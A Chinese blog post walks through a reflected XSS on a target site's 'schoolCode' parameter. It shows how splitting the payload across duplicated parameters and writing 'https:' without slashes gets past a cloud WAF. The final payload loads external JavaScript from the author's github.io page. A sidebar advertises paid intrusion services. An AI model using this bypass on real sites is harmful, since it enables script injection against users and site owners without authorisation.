前言:下面的漏洞挖掘案例,将会用到上篇提到的几个挖掘技巧。
1、我发现目标站点是存在传参回显
的,我在参数schoolCode中传入了一个值,接着返回的页面中回显了这个值。
2、接着进行数组传参
测试,构造了两个schoolCode参数进行传递,页面成功返回了jammny,jammny
3、通过fuzz,可以看到<script>完整的标签是能够被使用的。
4、云waf通常是通过语义检测攻击行为的,因此实际上很多标签都是可以被使用的。比如说<img>标签等:
5、本次payload构造选择就使用<script>,先在自己的github.io页面上新建一个xss.js文件,用于src外部引用,内容为:alert(/xss/)
。
6、正常引用肯定是被拦截的:
<script src="https://jammny.github.io/xss.js">
7、不着急,慢慢绕。从右往左的顺序,挨个删直到没有拦截为止。直到如下情况:
拦截:<script src=https://>
未拦截:<script src=https:/>
8、也就是说waf检测到https://
就会被拦截。这里科普一个冷知识,可以使用代替
//
进行绕过,效果是一样的:
https:jammny.github.io ==> https://jammny.github.io
9、重新开始补全路径,知道加入尖括号闭合后,被waf拦截。
10、由于目标可以使用数组传参,因此可以通过构造多一个参数来分割payload。
<script src=https:jammny.github.io/xss.js&schoolCode=>
11、再自己整合一下payload,闭合好标签。就可以成功绕过waf执行xss了。
<script%20src=https:jammny.github.io/xss.js%20&schoolCode=></script>
- 下一篇:记录又一次实战GetShell
猜你还喜欢
- 07-08九年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 03-21黑客如何破解wifi密码
- 01-12批量检测SQL注入
- 最新文章
- 随机文章
-
- “退改签”诈骗背后,到底谁为黑产大开方便之门?
- 经验分享|谈谈渗透测试中的信息搜集
- 技术讨论 | 记一次Node.Js反序列化攻击测试
- 99%的人都不知道的秘密:世上竟有如此酷炫的钓鱼系统!
- 文件上传限制绕过技巧
- 技术讨论 | 如何绕过并利用Bucket的上传策略和URL签名
- 后渗透阶段的权限维持(Windows篇)
- UEditor编辑器两个版本任意文件上传漏洞分析
- Apache Struts2 S2-057漏洞分析预警
- 搭建dvwa环境学习从MySql注入到GetShell
- 代码审计入门级DedecmsV5.7 SP2分析复现
- 黑产,彼之蜜糖,滴滴之砒霜
- 快讯 | 华住旗下酒店上亿条用户数据在暗网售卖,包含重要身份信息及开房记录
- linux操作系统的快捷键及命令讲解
- 技术分享 | 一种针对PHP对象注入漏洞的新型利用方法
- 自己动手打造工具系列之自动刷新简历
- 漏洞预警 | ECShop全系列版本远程代码执行高危漏洞
- 技术讨论 | 简谈渗透测试各阶段我常用的那些“神器”
- PHP WebShell代码后门的一次检查
- 利用Microsoft Edge漏洞窃取本地文件
- 热门文章
-
- 九年专业安全团队承接渗透入侵维护服务
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- Emlog黑客站模板“Milw0rm”发布
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑客怎样简单入侵别人手机,黑客是如何入侵手机的?
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 文章标签
-